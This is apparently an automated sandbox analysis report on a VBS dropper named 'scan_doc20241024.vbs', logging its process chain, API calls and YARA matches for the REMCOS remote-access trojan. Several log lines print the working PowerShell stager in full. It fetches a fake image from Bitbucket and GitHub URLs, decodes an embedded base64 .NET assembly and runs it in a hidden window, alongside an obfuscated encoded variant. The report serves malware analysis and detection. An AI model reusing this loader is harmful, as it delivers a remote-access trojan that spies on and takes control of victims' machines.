                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,13_2_0040F4A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041606A13_2_0041606A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042E24013_2_0042E240
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043120A13_2_0043120A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042B2F113_2_0042B2F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004304C113_2_004304C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041F4D313_2_0041F4D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040F4A713_2_0040F4A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044B4B013_2_0044B4B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044553C13_2_0044553C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041762113_2_00417621
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043163F13_2_0043163F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004476F813_2_004476F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043B69013_2_0043B690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042D79B13_2_0042D79B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043680C13_2_0043680C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040D9A013_2_0040D9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004309BD13_2_004309BD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00436A3B13_2_00436A3B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041FB7113_2_0041FB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00445C5913_2_00445C59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041FCB413_2_0041FCB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00430DD513_2_00430DD5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041EFDC13_2_0041EFDC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0042BE7E appears 33 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0042C720 appears 50 times
                  Source: scan_doc20241024.vbsInitial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4520
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4520Jump to behavior
                  Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: Process Memory Space: powershell.exe PID: 4872, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
                  Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.1cfcfc00000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
                  Source: 6.2.powershell.exe.1cfcfc00000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.1cfcfc00000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.rans.spre.troj.spyw.expl.evad.winVBS@8/7@0/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00410D25 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,13_2_00410D25
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040A7FF CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,13_2_0040A7FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00413B85 FindResourceA,LoadResource,LockResource,SizeofResource,13_2_00413B85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00413168 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_00413168
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-JX5AIB
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blz4h04t.10f.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: scan_doc20241024.vbsVirustotal: Detection: 17%
                  Source: scan_doc20241024.vbsReversingLabs: Detection: 15%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#CJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
